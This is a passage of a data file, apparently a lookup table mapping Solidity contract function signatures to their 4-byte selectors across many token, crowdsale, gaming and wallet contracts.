"DURATION_BEFORE_RESTORE_UNSOLD()": "0xbb1adf9b", "crowdsaleManager()": "0x341176d6", "weiAmount()": "0x0d10e842", "SMILO_FOUNDERS_AMOUNT()": "0x72414501", "finalReserveWallet()": "0xd6a3bc16", "decreaseStepPct()": "0xa44de4e7", "EtherTakeAfterSoftcap()": "0xf5d60acd", "consumptionPointer()": "0x62e7ba3f", "midEtherBonusValue()": "0x936224b8", "capTokenAmount()": "0x4cb93ff8", "fidaPerEther()": "0x957b52fb", "takerAffiliateFee()": "0xbae5f9dd", "preSaleSoldTokens()": "0xb68ed11f", "PoSPerCent()": "0x1ecd0d03", "transformSettingContract()": "0x54f47be7", "preSaleTokensPurchased()": "0xd1bb0433", "singleDigitBlock()": "0x9ed1e4c6", "getWinnerAccount()": "0x509515b5", "VINE_CAPACITY_PER_LAND()": "0xa99ce372", "team0Query()": "0xcc36a328", "GITHUB_LINK()": "0x9f5b1d2c", "totalTickets()": "0xdd11247e", "Drop()": "0xe3464b1b", "incentiveDistributionRoundDenominator()": "0x4c81e13a", "approveAddToken()": "0xa7d5d4fa", "canDisburseMultipleTimes()": "0x95b6a08d", "minFunding()": "0x193a4249", "withdrawAddress()": "0x1581b600", "currentRewardNum()": "0xe2164700", "deleteManager()": "0xa6314342", "getFACTOR()": "0x46e33afc", "partnersFundAddress()": "0x444195a3", "totalTokenMintedAngel()": "0x5a983451", "fetchDayTokens()": "0x2de16fdb", "pauseICOs()": "0xbcb7b0d4", "maxMinutesFundingPeriod()": "0xb55027a9", "nextTokenId()": "0x75794a3c", "deuseth()": "0x2294795d", "blocksInSecondCapPeriod()": "0x707c6b4d", "minimumTimeout()": "0xd8294ede", "minimal()": "0x94a53d41", "TOKEN_CREATORS_SUPPLY()": "0x4d9e40af", "earlyCommunityAddress()": "0x58feb4a3", "sendlimit()": "0x900e1248", "BONUS_HI_QTY()": "0xd71cdd78", "PrivateSaleStartTime()": "0x4a367c68", "mintWithMemo(string,address,uint256)": "0xe314d852", "setFeeDistributionAndStatusThreshold(uint8,uint8,uint256)": "0x3761d23f", "updateCABoxToken(address)": "0xe0a7527d", "CABCrowdsale()": "0x6606fe1e", "claimTokensToOwner(address)": "0x96d8b050", "validPurchaseTime(uint256)": "0x347518c7", "calcAmount(address)": "0xac4cfa4c", "buyTokensFromContract()": "0x06ed6908", "core(bool)": "0x9b63d0f4", "getNumWizards()": "0xa050d07d", "callCustomTokenFallback(address,address,uint256,string,bytes)": "0x213c3375", "isForceExecute(address)": "0x84488126", "privilegedTransfer(address,uint256,bytes,string)": "0x259eb959", "privilegedTransfer(address,uint256,bytes)": "0x22cf5011", "privilegedTransfer(address,uint256)": "0x7b5c7b7b", "setForceExecuteOfUsers(bool)": "0x6225b759", "setForceExecuteOfContracts(bool)": "0x2a29700f", "privilegedMintLock()": "0x2df80c87", "privilegedTransferLock()": "0x867eed11", "uncheckedUpgrade(address)": "0xb4aa24db", "setWithdrawalWallet(address)": "0x75796f76", "BOPToken(address,uint256)": "0xeb5b62b4", "Satochi4()": "0x340700e5", "payin()": "0x9308353f", "SpooksterCoin()": "0x45e93903", "CABoxToken()": "0xeef9495c", "setProposalNames(bytes32[])": "0xa364b5c1", "setSizeAndRate(uint256,uint256)": "0x2aff49d7", "_setMinter(address,bool)": "0xffb38e84", "_setOwner(address,bool)": "0xabb8c965", "ecrecoverDecode(bytes32,uint8,bytes32,bytes32)": "0x3388e429", "_recoverAddressFromSignature(bytes,bytes32)": "0xe61c6320", "recoverAddressFromSignature(bytes32,uint256,address,address,uint256,address,address,uint256,bytes)": "0xa03eb806", "verifyTransaction(bytes32,uint256,address,address,uint256,address,address,uint256,bytes,bytes)": "0xe1c1b939", "verifyLockSignature(bytes32,uint256,address,address,uint256,uint256,bytes32,bytes)": "0x1b14cd05", "verifyTimelock(bytes32,uint256,address,address,uint256,uint256,bytes32,bytes,bytes)": "0x01bbb8fa", "withdrawSettle(bytes32,uint256,address,address,uint256,uint256,bytes32,bytes,bytes,bytes32)": "0xf21153d2", "withdrawUpdate(bytes32,uint256,address,address,uint256,uint256,bytes32,bytes,bytes)": "0x46c4e533", "withdraw(bytes32,uint256,address,address,uint256,uint256,bytes32,bytes,bytes,bytes32)": "0xd70ed38a", "settleTransaction(bytes32)": "0x6eac86d4", "updateTransaction(bytes32,uint256,address,uint256,address,uint256,bytes,bytes)": "0xe6131706", "closeChannel(bytes32,uint256,address,uint256,address,uint256,bytes,bytes)": "0xea352634", "quickCloseChannel(bytes32,uint256,address,uint256,address,uint256,bytes,bytes)": "0x1b8f2610", "updateDeposit(bytes32,uint256,address,uint256,address,uint256,bytes,bytes)": "0x23855c18", "deposit(bytes32,uint256,address,uint256,address,uint256,bytes,bytes)": "0x95d793d9", "setSettleTimeout(uint256)": "0xc264a77c", "getChannelById(bytes32)": "0xf0d1eaaf", "getChannelCount()": "0x0eb8fe7a", "TrinityContract(address,address,uint256)": "0x4a03e7e3", "MMS()": "0xc5fa1924", "valueAtAddressLUT(uint256)": "0x295fe611", "addressLUTSize()": "0xb6496c6a", "FINTIFLUSHKA()": "0xb155d434", "_withdrawAll(uint256,address)": "0xe01bb918", "_transferAsset(uint256,address,bool)": "0xf4a05f8f", "_claim(address,uint256,bool)": "0x4cd52207", "claimWithdraw(address,uint256)": "0x6ec4c951", "cancelPawn(uint256,address,bool)": "0xa9d66127", "getPawnStatus(uint256)": "0x0e51c00d", "getPawnPackageId(uint256)": "0x0f3b305e", "getPawnLoanId(uint256)": "0x9dfb9de8", "getPawnEngine(uint256)": "0x8a172f2e", "getPawnOwner(uint256)": "0x021efe49", "getPawnId(uint256)": "0x7c7d14cf", "getPair(uint256)": "0xbdf391cc", "content(uint256)": "0xbaa0b806", "supportsInterface(bytes32)": "0xf1753550", "_moveToken(address,address,uint256,bytes,bool)": "0x56ad2931", "_doTransferFrom(address,address,uint256,bytes,bool)": "0x08be5bf3", "assetsOf(address)": "0x2c62fa10", "mult(uint256,uint256)": "0x9aa727f6", "receiveApproval(address,uint8)": "0xf09cac98", "vote(uint8,address)": "0xb81c6453", "countBit(uint8)": "0x1a4e0afd", "buyTokensInternal(uint256)": "0xa58ac1a1", "updatedTokensPerEth(uint256)": "0x55764c81", "addwhitelistedBatch(address[],address)": "0x5597801a", "addWhitelisted(address,address)": "0x40f13db5", "setWhitelisted(address,address)": "0xc96e785f", "setCurrentStage(uint256)": "0x38c67b73", "getUserTokenBalance(address)": "0xf5aec88c", "suspendSale()": "0x93d88409", "setSaleWindow(uint256,uint256)": "0x680e354a", "setBonus(uint256,uint256)": "0x037c99b0", "tokensOutInMarket()": "0x1ab1025c", "isOwnerOrAdmin(address,address)": "0x38dd22f0", "RECToken(uint256,string,uint8,string)": "0x1bb58beb", "calculateFee(uint256,uint256,uint256)": "0x5357b989", "withdrawLogic(bytes32,uint256,uint256,uint256[])": "0xe45d4717", "depositLogic(address,uint256,uint256,uint256)": "0x1c8f7570", "lookupFillingRing(address,uint256)": "0xccc51afb", "withdrawERC20Compatible(bytes32,uint256,uint256,uint256[])": "0x6e0e7e85", "withdrawEther(bytes32,uint256,uint256,uint256[])": "0xd0aa407f", "depositERC20Compatible(address,uint256,uint256,uint256)": "0x5f8e38e1", "depositEther(address,uint256,uint256,uint256)": "0xc515627e", "expMod(uint256,uint256,uint256)": "0xad69caa5", "scalarBaseMult(uint256)": "0x60771261", "findYforX(uint256)": "0x15d7811e", "hashToPoint(bytes32)": "0x8236342c", "generator()": "0x7afa1eed", "checkIsOnlyProxy(bytes32)": "0x8ec63da9", "checkIsOnlyOwner(bytes32)": "0xe974c000", "__callback(uint256,bytes32)": "0x9842a37c", "addSolver(address)": "0xec58f4b8", "LivepeerVerifier(address,address[],string)": "0x5ca7f2f0", "fetchRecentSubmittals()": "0xe3651ef3", "addSubmittal(bytes,address)": "0x47de3b76", "fetchHash(uint256)": "0xf25b278b", "Leak()": "0x8a6d39b9", "setKv(uint256,uint256)": "0xf06ebc38", "ManagerProxyTargetMockV3(address)": "0x1d9400c2", "multiline(uint256,uint256)": "0x3631826a", "usesLibrary()": "0xcb9aac64", "isConstant()": "0xa5abe7f6", "isView()": "0x7bc120c2", "isPure(uint256,uint256)": "0xb0f42dc4", "usesThem()": "0x62599964", "termsAndConditionsAreSigned(uint8,bytes32,bytes32)": "0xf69a3c7b", "getFundByManager(address)": "0x3fefc25d", "getLastFundId()": "0x28e68ebe", "getFundById(uint256)": "0x149e685a", "getNativeAsset()": "0xcf6661fb", "shutDownFund(address)": "0x42e2f54c", "setupFund(string,address,uint256,uint256,address,address,address,address[],address[],uint8,bytes32,bytes32)": "0x7ad979a3", "addEvent(uint256,string,bytes32,bytes32,string,bytes32)": "0x78d8615f", "localCheck(uint256,string,bytes32,bytes32,string,bytes32)": "0x21c9a6b1", "localPaiementConfirmation(bytes32,bytes32)": "0xca1a2eb4", "localManualEntry(bytes32,bytes32,uint256,uint256,address)": "0x03e20503", "getEventSize()": "0x3448348d", "getEvent(uint256)": "0x6d1884e0", "resetEvents()": "0x7a631201", "TCI_client(bytes32,address,address)": "0x566c8ed2", "getNew(address,bytes32)": "0x1da88cbe", "checkFunction(bytes32,uint256)": "0xc386ff7d", "paiementConfirmation(bytes32,bytes32)": "0xc3d54c9a", "whoIsConcerned(address)": "0x1fe97e45", "wantsBusiness(bytes32,bytes32,address)": "0x5c207547", "manualEntry(bytes32,bytes32,uint256,uint256,address)": "0xb0cc3951", "TCI_admin()": "0xa33cbc55", "checkReward(uint256,uint256)": "0xbfd8222a", "checkForInterest(uint256,bool)": "0x5bebefdc", "checkProviderOwnerSupply(uint256,bool)": "0x6f910c4b", "checkReward(address,uint256,uint256)": "0x7e3e7bdf", "_appendSchellingSupplyChanges(uint256,uint256,bool)": "0x19ca6feb", "appendSchellingSupplyChanges(uint256,uint256,bool)": "0x1913742f", "appendSupplyChanges(address,bool,uint256)": "0x8aef16d0", "getReward(address,uint256,uint256)": "0x50f9b39e", "providerRewardLib(address)": "0x904dc85d", "_setSchellingRoundSupply(uint256)": "0xbcb0a787", "_getSchellingRoundSupply()": "0xd928a3d8", "_getSchellingRoundDetails(uint256)": "0xbf5a79ee", "_getCurrentSchellingRound()": "0xae22e331", "_getProviderRateHistory(uint256,uint256,uint8)": "0xb1b82922", "_getProviderIsForRent(uint256)": "0xc883346e", "_setProviderSupply(uint256,uint256,uint256)": "0xa9e406d5", "_setProviderSupply(uint256,uint256)": "0x8f7db6ee", "_getProviderSupply(uint256,uint256,uint256)": "0xfcd10753", "_getProviderSupply(uint256)": "0xcb77ed34", "_getProviderPriv(uint256)": "0x5ec70cd2", "_getProviderAdmin(uint256)": "0xb5fcfbcc", "_getProviderClosed(uint256)": "0xf267215a", "_getProviderOwner(uint256)": "0x9a21213e", "_setClientSupply(address,uint256)": "0x03aeeba6", "_setClientSupply(address,uint256,uint256)": "0xf071cacb", "_setClientLastPaidRate(address,uint8)": "0xaf737da7", "_setClientPaidUpTo(address,uint256)": "0xd689cfe1", "_getClientPaidUpTo(address)": "0xadb5da34", "_getSenderStatus(uint256)": "0xba88d537", "_getClientLastPaidRate(address)": "0xbc9e6b0f", "_getClientProviderUID(address)": "0x620b2731", "_getClientSupply(address,uint256,uint256)": "0x8a1abbcf", "GoodBit()": "0x20e33b13", "subtractScalar(int256[],int256)": "0x565e4fa1", "Predictor()": "0x3746b446", "DataCoin(address)": "0xa5b4069e", "bondingManager()": "0x426eae45", "setRoundLockAmount(uint256)": "0x0b1573b8", "setRoundLength(uint256)": "0x681312f5", "RoundsManager(address)": "0x32736fb0", "beneficiaryMultiSigWithdraw(uint256)": "0x79ca0792", "BuyEBETtokens()": "0xa635e7c5", "setPrice()": "0xda93d0d1", "SetupCrowdsale(uint256,uint256)": "0xac06e302", "remainingSupply()": "0xda0239a6", "initialEBETSupply()": "0x87f162c8", "EBETCrowdsale()": "0x87e19cc5", "safeAssert(bool)": "0xcf464997", "create(address,bytes32,address,bytes32,address,bytes32)": "0x635994fd", "getProviderSales(address)": "0xda9e13aa", "getProviderData(address)": "0xfc2d64e3", "redeem(address,uint256,string)": "0xb1cd221a", "makePromise(uint256)": "0x40e099ac", "writeConditions(uint8,string)": "0x8b8d7c04", "writeDefinitions(uint8,string)": "0x36d373c0", "writeMerchandises(uint8,string)": "0x31226f71", "ricardianVoucher(uint256,string,uint8,string,string,string,uint8,uint8)": "0xe7fc4b64", "removeOwners(address[])": "0xa9a5e3af", "addOwners(address[])": "0x6c46a2c5", "node_dupes(uint256)": "0x56632637", "node_count(uint256)": "0xbdc0f93c", "getPublicAllocation()": "0x02c28410", "setTkContractAddress(address,address)": "0x5ada0f51", "EKK()": "0x39e33636", "BonBonToken(address)": "0x2c1b17e4", "receiveCashback(address)": "0xff4329ee", "addCashback(string,address,uint256[],uint256[])": "0x4baa9dc7", "HaHaChainToken()": "0xe0ac2b72", "addBadge(string,uint256)": "0x79a9986c", "swapToken(uint256)": "0x4bbf3a7a", "swapAbleToken()": "0xcfa5df4b", "withdrawOldToken(address,uint256)": "0x43156db6", "swapAble(bool)": "0x27270550", "tokenSetup(address,address,address)": "0x4c873c48", "getPaymentsLength()": "0xb8e0ffbe", "convertData(bytes)": "0xaf66c560", "TalkToExpertPayment(address)": "0xf1b0202e", "DataToken()": "0xe0b1cecd", "EbolaToken()": "0xed00b73f", "withdrawRefund(uint256)": "0x9d153495", "refundPayment(uint256,address,string)": "0x31d4fad4", "payForOrder(uint256,address,uint256)": "0xb5ac7c27", "changeMonethaVault(address)": "0x102deb9c", "acceptPayment(address,uint256)": "0x2ac68b78", "MonethaGateway(address,address)": "0x857f54e4", "changeMerchantAccount(address)": "0x63397825", "doWithdrawal(address,uint256)": "0x76586bcb", "setCompositeReputation(string,uint32)": "0xe25a51b6", "setPaymentSettings(string,string)": "0xe3577e71", "setProfile(string,string,string,uint32)": "0x370fed6e", "compositeReputation(string)": "0x7dd91734", "paymentSettings(string)": "0x2aa0da47", "profile(string)": "0xe8c0485f", "MerchantWallet(address,string)": "0x0f95378f", "setMonethaAddress(address,address,bool)": "0x6e22e32b", "disprove()": "0x143c56cf", "complete(address)": "0x93af0292", "startRecovery(address,address)": "0xc89ec68a", "createSetup(uint256,uint256,address[])": "0xa942de01", "transferEtherFrom(address,address,uint256)": "0xde4f9383", "getIdentifierByIndex(address,uint256)": "0x5ac942a7", "getIdentifiersCount(address)": "0x0683dfdb", "getIdentifiers(address)": "0x81767aed", "removeIdentifier(address,bytes32)": "0x83abd7e2", "setIdentifier(address,bytes32)": "0xab888539", "getRoles()": "0x71061398", "setBaseStorage(bytes4,uint256,string)": "0x785bc758", "validateDescription(string)": "0xa69722de", "validateTypeReference(uint256,bool)": "0x7d2c93d7", "getActionParameterByIndexes(uint256,uint256)": "0x878e8827", "getActionParametersCountByIndex(uint256)": "0x10316eec", "getActionByIndex(uint256)": "0xaf47c1af", "getViewDataByIndex(uint256)": "0x892e8dd9", "getSetupParametersByIndex(uint256)": "0x1feaee17", "getSetupFunctions()": "0xa0a337e2", "getActionsCount()": "0x80ba4b75", "getViewDatasCount()": "0x1692823d", "getSetupParametersCount()": "0xd8f0c358", "getViewDatas()": "0xf2a5c79c", "getActions()": "0x504d080b", "getSetupParameters()": "0x8edfaef8", "executeCall(address,uint256,uint256,bytes)": "0x8ba7e570", "AC(uint256,string,string)": "0x7b8fac4f", "BretCoin()": "0xb8c6d2e9", "limorico()": "0x4798a2e3", "DASHABI(uint256,string,string)": "0xd248cf1f", "DASHABI(uint256)": "0xb3528158", "BlockChainCourse()": "0x15aec7ee", "maxHistoryRecordID()": "0x28a52d3e", "maxRecordID()": "0xa71e46d3", "currentRating()": "0xf21711f3", "getNewRecordInHistoryRecord(uint256)": "0x9da78649", "getOldRecordInHistoryRecord(uint256)": "0x098956a8", "getHistoryRecord(uint256)": "0x16cc7699", "getRecord(uint256)": "0x03e9e609", "deleteRecord(uint256,string,string,bytes32)": "0x52e8f2c3", "modifyRecord(uint256,string,string,string,bytes32,int64)": "0xba90f022", "addRecord(string,string,string,bytes32,int64)": "0xa92fcf9c", "rate_change(uint256)": "0x70acbe0e", "balanceEth(address)": "0x00837b15", "balanceMaxSupply()": "0xcdc3e046", "totalTokenSold()": "0xb5f7f636", "ihomekey()": "0x3fc499b2", "giveITup()": "0xf295587e", "getAvar()": "0x74536403", "getAllUsers(bool)": "0xcd73df78", "getUnapprovedUsersTop150(bool)": "0xee51575e", "getUsersAwaitingForTokensTop150(bool)": "0xb6435f00", "Kokos()": "0x6ad7541c", "DIGIPLACED()": "0x7f17ce9b", "unfroze_contract()": "0xaa541c9f", "froze_contract()": "0x7827b226", "deleteMember(uint256)": "0x88bec9da", "showPoolNumber(address)": "0x03d37d78", "relievePool(uint256)": "0x51f1333e", "withdrawToPoolOwnerFee(uint256)": "0x9a2d2692", "withdrawToPoolOwner(uint256)": "0x10f945c7", "outFromPool(uint256)": "0xfb0b0220", "WalletWithDailyLimit(address[],uint256,uint256)": "0x2b6ada6d", "Wallet(address[],uint256)": "0x99fbe995", "MetaHash()": "0x82f0151c", "double(uint256)": "0xeee97206", "memberIsActive(uint8)": "0xcc436e42", "donationAddress()": "0xec034bed", "inactivityTimeout()": "0x7bbb3a60", "maxMembers()": "0xbf4386a0", "getMemberInformation(uint8)": "0xaef3bc17", "getMembershipStatus(address)": "0xa7f2f4e2", "donateTokens(address)": "0x08614362", "donateFunds()": "0x7150773d", "passMessage(address,string)": "0x1c14b340", "directMessage(uint8,string)": "0xe998db2a", "broadcastMessage(string)": "0x186690b0", "revokeMembership(uint8)": "0xb10c7dc4", "proclaimInactive(uint8)": "0xe8350fae", "transferMembership(address)": "0x861080ae", "changeKey(string)": "0xbbbff571", "changeName(bytes32)": "0x898855ed", "newMember(uint8,bytes32,address)": "0x8c9c2977", "theCyber()": "0x33099beb", "whitelist(address,address)": "0xb092145e", "migrationInitiated(address)": "0xc778427b", "finalizeMigration(address,address)": "0xc7576ed4", "addOwner(address,address,address)": "0xa949c637", "cancelMigration(address,address)": "0xa5967039", "addOwnerFromRecovery(address,address,address)": "0x754fd352", "forwardTo(address,address,address,uint256,bytes)": "0x701b8826", "migrationNewAddress(address)": "0x422e33f3", "changeRecovery(address,address,address)": "0x3061e0ef", "initiateMigration(address,address,address)": "0x1e2629e1", "removeOwner(address,address,address)": "0x1a45fac7", "relayMetaTx(uint8,bytes32,bytes32,address,bytes,address)": "0xc3f44c0a", "createIdentityWithCall(address,address,address,bytes)": "0x3c8ac88e", "SetReciver(address)": "0x410c8005", "SetGiftTime(uint256)": "0xdac47a71", "GetGift()": "0xbea948c8", "testTrade(address,uint256,address,uint256,uint256,uint256,address,uint8,bytes32,bytes32,uint256,address,bool)": "0xfe86de13", "buyWithLimit(uint256,uint256)": "0xe0cb3aa0", "transferViaTokenTransferProxy(address,address,address,uint256)": "0x2d6f70f7", "SGF()": "0xf7342cd3", "showMessage()": "0x8125ceb2", "people()": "0x783f6af5", "num()": "0x4e70b1dc", "editMessage(string)": "0x1dcd5312", "aekS()": "0x5b61291c", "ownerTransferOwnership(address)": "0xa09cca93", "priviledgedAddress()": "0x937c0cdf", "nextFreeze()": "0x8b64574b", "crowdfundDeadline()": "0x8480021c", "priviledgedAddressBurnUnsoldCoins()": "0x6410c41a", "nextThaw()": "0x58e879f3", "tokensFrozen()": "0x2efa79d3", "updateTokenStatus()": "0x25ffba04", "ownerSetPriviledgedAddress(address)": "0x040ea2f4", "artefact_keep(bytes1)": "0x00000082", "account_info_rotate_tine(uint256)": "0x00000001", "left_branch_block(uint32)": "0x00000000", "transferProxy(address,address,uint256,uint256,uint8,bytes32,bytes32)": "0xeb502d45", "required_strconv(string,string)": "0x000000f8", "XXX_unrecognized_adapter(string)": "0x00000039", "tree_stream(bytes,bytes)": "0x000000a0", "access_coconut_alarm(uint256)": "0x000000ed", "razor_balance(bool)": "0x00000002", "bright_peace(bytes32,bytes)": "0x0000006e", "overdiffusingness(bytes,uint256,uint256,uint256,uint256)": "0x00000000", "get_block_hash_257335279069929(uint256)": "0x00000000", "pledge_future(uint256,uint32,uint8)": "0x000000de", "cherry_tomorrow(uint256,uint64,bool)": "0x000000f5", "muscle_teach(uint256,uint64,uint8)": "0x000000da", "lend_during(uint256,uint256,uint64,uint32)": "0x000000c7", "math_rotate(uint256,uint256,uint64,uint64)": "0x00000063", "pistol_valve(uint256,uint32)": "0x000000a1", "good_mirror(uint256,uint32)": "0x0000003a", "display_allow(uint256,uint256,uint256,uint32)": "0x0000006e", "viable_print(int256,uint256,uint256,uint64)": "0xdf68a516", "conduct_auto(uint256,uint256,uint256)": "0x00000080", "festival_happy(uint256,uint256)": "0x000000c4", "WithdrawSpecialToken(address,uint256)": "0xb65ae769", "OwnerRetireHodl(uint256)": "0x13e60074", "UserRetireHodl(uint256)": "0xd702db81", "transferProfitToHouse()": "0xfd306ca7", "rejectGame(address,uint256)": "0xfb1641d6", "gameIdCntr()": "0xf87ffb74", "setHouseAddress(address)": "0xef3aaf54", "maxStake()": "0xea1b28e0", "activeGames()": "0xe475222e", "MAX_TIMEOUT()": "0xde38eb3a", "updateTime()": "0xdc555090", "serverAddress()": "0xdb420fe3", "houseAddress()": "0xd7cee31e", "serverEndGame(uint32,uint8,uint16,uint256,int256,bytes32,bytes32,uint256,address,address,bytes)": "0xd6f0b484", "serverForceGameEnd(address,uint256)": "0xd1e9dcbf", "updateConflictResolution(address)": "0xcbffb1ae", "houseStake()": "0xc861f3a0", "acceptGame(address,uint256,bytes32)": "0xc3b1ff93", "TIMEOUT_DESTROY()": "0xbd5c4e24", "serverEndGameConflict(uint32,uint8,uint16,uint256,int256,bytes32,bytes32,uint256,address,bytes,address,bytes32,bytes32)": "0xb5d9f80b", "playerCancelActiveGame(uint256)": "0xaff06fbd", "playerEndGame(uint32,uint8,uint16,uint256,int256,bytes32,bytes32,uint256,address,bytes)": "0xae640923", "serverCancelActiveGame(address,uint256)": "0xa8182cd3", "newConflictRes()": "0xa09f8659", "doOraclize()": "0xe10e8ffe", "rollRoom(uint256)": "0xb1e2e1dc", "closeRoom(uint256)": "0x1c3a8892", "openRoom(uint256,uint256)": "0x33102ff9", "rollSystem(uint256)": "0xe3b49a03", "returnAllRoomsBalance()": "0x6db90900", "getAvailableBalance()": "0x809dab6a", "DiceOffline()": "0x6b6566f0", "getRoomData(uint256)": "0x2e6d18ec", "getRoomCurrentSet(uint256)": "0xf47ce310", "getRoomStatus(uint256)": "0x8fcee83f", "getRoomBalance(uint256)": "0xff61ad09", "getRoomSetCount(uint256)": "0xae3b2137", "getRoomOwner(uint256)": "0x6ee88301", "getRoomID(uint256)": "0x59117bae", "getRoomCount()": "0xeadddb3c", "removeFreeRoom()": "0x582d2d32", "returnAllBalance()": "0xf13c7f57", "getAllBalance()": "0xeb9969a8", "deleteRoom(uint256)": "0x682b7100", "deleteRoomByRoomID(uint256)": "0xef15c51c", "getRoom(uint256)": "0x6d8a74cb", "getBetValue(uint256,uint256,uint256)": "0xece11912", "calculateRoom(uint256,uint256,bool,uint256)": "0x1ab86572", "tryRollRoom(address,uint256,uint256)": "0x1c429165", "tryCloseRoom(address,uint256,uint256)": "0x488f3b6a", "tryOpenRoom(address,uint256,uint256,uint256)": "0x4d6a26be", "RoomManager()": "0x92536070", "getMyWinAmount(address)": "0xba236abe", "getMyPlayedAmount(address)": "0x1b0b906b", "getMyOpenedCount(address)": "0x89b7e746", "getMyPlayedCount(address)": "0x2cf9185c", "getMyRecord(address,uint256)": "0x4b1ef6e1", "getMyRecordCount(address)": "0x91410e41", "addGameRecord(address,uint256,uint256,uint256,uint256)": "0x382e5272", "setReferral(address,address)": "0x7543e3f0", "subOpenRoomCount(address)": "0xcaded711", "addOpenRoomCount(address)": "0x89668a39", "addWin(address,uint256)": "0xbb25bd15", "addBet(address,uint256)": "0xf03a1bc6", "UserManager()": "0x56bc0c5e", "setTaxRate(uint256)": "0xc6d69a30", "setTripleRoomMin(uint256)": "0x4bb13e63", "setTripleRoomMax(uint256)": "0xdc2a3056", "setNormalRoomMin(uint256)": "0x0140ea82", "setNormalRoomMax(uint256)": "0x0e7238f1", "setMaxWin(uint256)": "0xf0ee7df2", "setMaxStake(uint256)": "0x6fc14837", "setMinStake(uint256)": "0x8c80fd90", "setOraGasLimit(uint32)": "0x596a072c", "setRandomApiKey(string)": "0x52ea8a71", "joinToTrack(uint256)": "0x5244ed87", "createTrack()": "0x8f2e8d4a", "RiekCoin()": "0xac256e1d", "callFor(address,uint256,bytes)": "0x12ce73dc", "ClassyCoin()": "0x8505a074", "approveCertificate(bytes32,bytes32,bytes32,bool)": "0x161d2a59", "updateMetaData(bytes32,bytes32,bytes32,uint256,bytes32,bytes32)": "0x26d2cba5", "getIssuerArray(bytes32)": "0x01e5aa3e", "getStudentArray(bytes32)": "0x845e76b3", "getCertificationList(bytes32,bytes32)": "0xe2e54288", "getCertificateMetaData(bytes32,bytes32,bytes32,uint256)": "0x92771e0f", "getCertificateMetaDataCount(bytes32,bytes32,bytes32)": "0xcc3b8806", "isValidCertificate(bytes32,bytes32,bytes32)": "0x9a251185", "getCertificate(bytes32,bytes32,bytes32)": "0x53811553", "addMetaData(bytes32,bytes32,bytes32,bytes32[],bytes32[])": "0x245a810b", "addCertificate(bytes32,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32,string,bytes32[],bytes32[])": "0x83ae5266", "IonixxToken(uint256,string,string)": "0x7e766e1f", "W3SchoolToken(uint256,string,string,uint256)": "0x959d51f6", "LYBT3Token(uint256,string,uint8,string)": "0x5bea2941", "actual_balance(address)": "0xde78ed85", "STCToken()": "0x7264727d", "MERZhToken()": "0xb066dca9", "QUEENTEN()": "0x0a919e3c", "BABYT()": "0x376678e3", "revertTest()": "0x81bd24d1", "setVal(uint256)": "0x3d4197f0", "getVal()": "0xe1cb0e52", "reverter(uint256)": "0x2d6c5a84", "cuck()": "0x2e90aae8", "outsourceDelivery(uint256,uint256,int256,int256,int256,int256)": "0x3d69f4d6", "updateLocation(int256,int256)": "0x8b603300", "finishDelivery()": "0xd4a99d61", "getTupleDetails()": "0x6140128f", "getDepositValue()": "0x98d07356", "Delivery(address,uint256,uint256,int256,int256,int256,int256,address)": "0xd33d6f65", "getDelivery()": "0xdff675c2", "createContract(uint256,uint256,int256,int256,int256,int256)": "0xa6c93349", "oraclize()": "0x3d9aa932", "OAR()": "0xc90c589a", "proofType_Native()": "0x7cbbf1da", "proofType_Ledger()": "0xce6a9bd6", "proofType_Android()": "0xf0c001df", "getRunningRazInstance(uint256)": "0x3a762f73", "getRazInstanceInformation(uint256,uint256)": "0xaaf885f8", "Test9J()": "0x7503af06", "frozenCheck(address,address)": "0x3c0e5d74", "_status()": "0x0fb3844c", "judgement(bool)": "0x8815f3d3", "safeMulWithPresent(uint256,uint256)": "0x79f0f7b3", "pay(address,uint128,string,uint32)": "0x2bf82843", "unlock(bytes16,uint32)": "0xa6b55eec", "executeLock(bytes16,address)": "0xb09f4af5", "lock(uint128,string,address,bytes16,uint32)": "0xb05005a2", "withdraw(uint128,string,uint32)": "0xf9e51b1d", "deposit(address,uint128,string,uint32)": "0x98bd359c", "getLocked(bytes16)": "0xd084f670", "checkBalance(address,string)": "0x7405322e", "transfer(uint128,bytes16,uint32)": "0x2c45f068", "getIssuer()": "0x52556421", "setIssuer(address,uint32)": "0xb3f1c0c9", "setMatured(uint32)": "0x34a8f866", "Bond(uint256,string,string,string,uint128,uint128,uint128,uint128,uint16,string,string,address)": "0x192b3608", "switchTransfers()": "0x0fb26f0b", "Propethy()": "0x5e007742", "withdrawTokensFromContract(uint256)": "0xffd4f4b2", "withdrawEtherFromcontract(uint256)": "0xb9ed6df8", "onlyPayForFuel()": "0x6f6c0759", "Cryptoya()": "0x8cdf31fa", "CappedCrowdsale(uint256,uint256,uint256,uint256,address)": "0x654a9f69", "Git(uint256)": "0x12278825", "TokenDemo(uint256,string,uint8,string)": "0x4f7132c0", "setMaxLevel(uint8)": "0x21c87ee8", "isRespectTimeFrame()": "0xc9456530", "isAfterEnd()": "0x0dc1d357", "getLogos()": "0x12660306", "isLogo(address)": "0x61ecc8b5", "cleanBalance()": "0x7f55b2d9", "claimWinner()": "0x237297a4", "registLogo(address,address,string)": "0x1f7df96f", "sendToFaucet(uint256)": "0x6e2f5f12", "LogoVote()": "0xdbaf023d", "GoldDollar()": "0x864b525c", "AdexContract(address,address,address,uint256,uint256,uint256)": "0xc9a4faa6", "changeOldTokenReward(address)": "0xc2248c22", "Swachhcoin(address)": "0x2089d0c9", "graceTransfer(address,uint256)": "0x6389e019", "putEther()": "0x330fb4a3", "sellCoins(uint256)": "0x51a4cd73", "setSellExchangeRate(uint256)": "0x9e8558a0", "setBuyExchangeRate(uint256)": "0x09357344", "GraceCoin()": "0x0c3e4004", "ethunpause()": "0xc89fb5f0", "ethpause()": "0x7ea1e2d9", "isReturnRequested(address)": "0xa23d64c4", "getReturnAddress(address)": "0x275d60bc", "requestReturn(address)": "0x7ec4a5a6", "ChooseWHGReturnAddress(uint256)": "0x4377d12c", "MSCToken()": "0x3ea79cb1", "XNON()": "0x402c5644", "mint(address,uint256,string,uint256,uint256,uint256,uint256,uint256,uint256)": "0x7360ab6e", "CryptovoxelsProperty(string,string)": "0xac01367f", "EAAS()": "0x636ca6c2", "Readycoin()": "0xa3980dd7", "PFC(address)": "0xc3462818", "MiniMeTokenSimple(address,address,uint256,string,uint8,string,bool)": "0x0f973874", "YeekFormula()": "0xff574213", "submit(bytes32,bytes32,bytes32)": "0xfd080993", "SicBo(address)": "0x4948d91d", "IHubToken()": "0x99076eca", "FacebookCoin()": "0x53c2e8ab", "BPRchain()": "0x0a2cafac", "lockTime(address,uint256)": 